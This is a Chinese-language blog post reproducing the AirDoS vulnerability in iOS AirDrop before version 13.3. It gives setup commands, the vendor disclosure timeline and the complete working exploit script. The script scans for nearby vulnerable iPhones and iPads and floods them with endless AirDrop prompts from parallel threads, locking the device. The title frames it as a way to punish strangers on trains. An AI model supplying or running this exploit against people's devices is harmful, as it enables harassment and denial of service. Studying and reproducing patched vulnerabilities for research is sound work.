喵喵喵
这个vuln还是很有意思,居家旅行必备!
先看一下原作者怎么说的.
https://kishanbagaria.com/airdos/ [自己看去]
行了看完了🐣🐣🐣 简言之,就是别人的iPhone或者ipad在允许所有人传送文件给他时,就可以利用这个漏洞进行XXOO,要求系统版本低于13.3,我就是闲的没事不升级的. poc地址:https://github.com/KishanBagaria/AirDoS/blob/master/AirDoS.py
测试环境:
IPadPro 13.2
测试前记得
Usage
Run
brew install libarchive [email protected].1
if not already installed
Set environment variables:
export LIBARCHIVE=/usr/local/opt/libarchive/lib/libarchive.dylib
export LIBCRYPTO=/usr/local/opt/[email protected].1/lib/libcrypto.dylib
Run pip3 install -r requirements.txt
Run python3 AirDoS.py
我的成果图
漏洞复现视频
漏洞Timeline
2019-08-19:报告已发送给苹果
2019-10-03:要求更新
2019-10-03:苹果回复:“我们仍在调查此问题。如果我们确定我们的产品受到影响,就可以为我们的客户准备安全更新。”
2019年11月14日:苹果公司通过电子邮件发送了电子邮件:“我们将在即将到来的安全更新中以缓解的方式解决您报告的问题,希望您对我们最新的iOS 13.3 Beta进行测试确定是否解决了该问题。收到CVE,我们希望在安全咨询中公开承认您的协助。”
2019-11-15:我答复苹果这个漏洞已在iOS 13.3 beta 2中修复,并询问何时可以公开披露
2019-11-15:苹果回答:“如果您可以在安全更新发布给我们的客户之前不公开讨论此问题,我们将不胜感激。该安全更新当前计划于2019年12月中旬进行。”
2019-12-10:iOS 13.3发布安全公告,已发布并公开披露
原文始发于微信公众号(RedTeamWing):IOS-AirDrop-Dos复现[专治高铁上抖音外放之人
拓展阅读(点评/知识):
#!/usr/bin/env python3 """ AirDoS by Kishan Bagaria https://kishanbagaria.com/airdos/ """ import ipaddress import json import logging import plistlib import random import threading from colorama import Fore, Back, Style from opendrop.client import AirDropBrowser, AirDropClient from opendrop.config import AirDropConfig, AirDropReceiverFlags start_new_lines = '\n' * 10 end_new_lines = '\n' * 100 SENDER_NAME = 'Attacker 😈' FILE_NAME = f""" {start_new_lines} ⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️ 😈😈😈😈😈 You can no longer use this device Go outside and play! ⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️⚠️ {end_new_lines} 😈 """ rand = lambda: '{0:0{1}x}'.format(random.randint(0, 0xffffffffffff), 12) attack_counts = {} config = AirDropConfig() logger = logging.getLogger(__name__) logging.basicConfig(level=logging.INFO, format=f'{Style.DIM}%(asctime)s{Style.RESET_ALL} %(message)s') def get_os_version(discover): try: receiver_media_cap = json.loads(discover['ReceiverMediaCapabilities']) return receiver_media_cap['Vendor']['com.apple']['OSVersion'] except: pass def get_is_mac(os_version): if os_version: if os_version[0] == 10 and os_version[1] >= 7: return True return False def get_is_vuln(os_version): if os_version: if (os_version[0] == 13 and os_version[1] >= 3) or os_version[0] >= 14: return False return True def send_ask(node_info): ask_body = { 'SenderComputerName': SENDER_NAME, 'SenderModelName': rand(), 'SenderID': rand(), 'BundleID': 'com.apple.finder', 'Files': [{ 'FileName': FILE_NAME, 'FileType': 'public.plain-text' }] } ask_binary = plistlib.dumps(ask_body, fmt=plistlib.FMT_BINARY) id = node_info['id'] attack_counts[id] = attack_counts.get(id, 1) + 1 try: client = AirDropClient(config, (node_info['address'], node_info['port'])) success, _ = client.send_POST('/Ask', ask_binary) if success: # if user accepted client.send_POST('/Upload', None) return success except: pass def send(node_info): name = node_info['name'] id = node_info['id'] attack_count = attack_counts.get(id, 1) receiver_name = Fore.GREEN + name + Fore.RESET logging.info(f'❔ Prompting {receiver_name} (#{attack_count})') success = send_ask(node_info) if success == True: logging.info(f'✅ Accepted by {receiver_name} (#{attack_count})') elif success == False: logging.info(f'❎ Declined by {receiver_name} (#{attack_count})') else: logging.info(f'🛑 Errored {receiver_name} (#{attack_count})') return success def brute(node_info): error_count = 0 while True: if send(node_info) == None: error_count += 1 if error_count > 2: break def start_brute(node_info): # two threads just for good measure # this makes sure there is always another popup to decline if there is any network delay for i in range(2): thread = threading.Thread(target=brute, args=(node_info,)) thread.start() def found_receiver(info): thread = threading.Thread(target=on_receiver_found, args=(info,)) thread.start() def send_discover(client): discover_body = {} discover_plist_binary = plistlib.dumps(discover_body, fmt=plistlib.FMT_BINARY) success, response_bytes = client.send_POST('/Discover', discover_plist_binary) response = plistlib.loads(response_bytes) return response def on_receiver_found(info): try: address = ipaddress.ip_address(info.address).compressed except ValueError: return id = info.name.split('.')[0] hostname = info.server port = int(info.port) client = AirDropClient(config, (address, int(port))) flags = int(info.properties[b'flags']) receiver_name = None if flags & AirDropReceiverFlags.SUPPORTS_DISCOVER_MAYBE: try: discover = send_discover(client) receiver_name = discover.get('ReceiverComputerName') os_version = get_os_version(discover) except: pass discoverable = receiver_name is not None node_info = { 'name': receiver_name, 'address': address, 'port': port, 'id': id, 'flags': flags, 'discoverable': discoverable, } if discoverable: os_v = '.'.join(map(str, os_version)) if os_version else '' is_mac = get_is_mac(os_version) is_vuln = get_is_vuln(os_version) additional = f'{Style.DIM}{id} {hostname} [{address}]:{port}{Style.RESET_ALL}' if is_mac: logger.info('❌ Ignoring {:32} macOS {:>7} {}'.format(Fore.YELLOW + receiver_name + Fore.RESET, os_v, additional)) elif not is_vuln: logger.info('❌ Ignoring {:32} iOS {:>7} {}'.format(Fore.RED + receiver_name + Fore.RESET, os_v, additional)) else: logger.info('🔍 Found {:32} iOS {:>7} {}'.format(Fore.GREEN + receiver_name + Fore.RESET, os_v, additional)) start_brute(node_info) logger.info('⏳ Looking for devices... Open Finder -> AirDrop') browser = AirDropBrowser(config) browser.start(callback_add=found_receiver) try: input() except KeyboardInterrupt: pass finally: if browser is not None: browser.stop()
本文标题: | IOS-AirDrop-Dos复现[专治高铁上抖音外放之人 |
本文链接: (转载请附上本文链接) | https://vulsee.com/archives/vulsee_2019/1212_9639.html |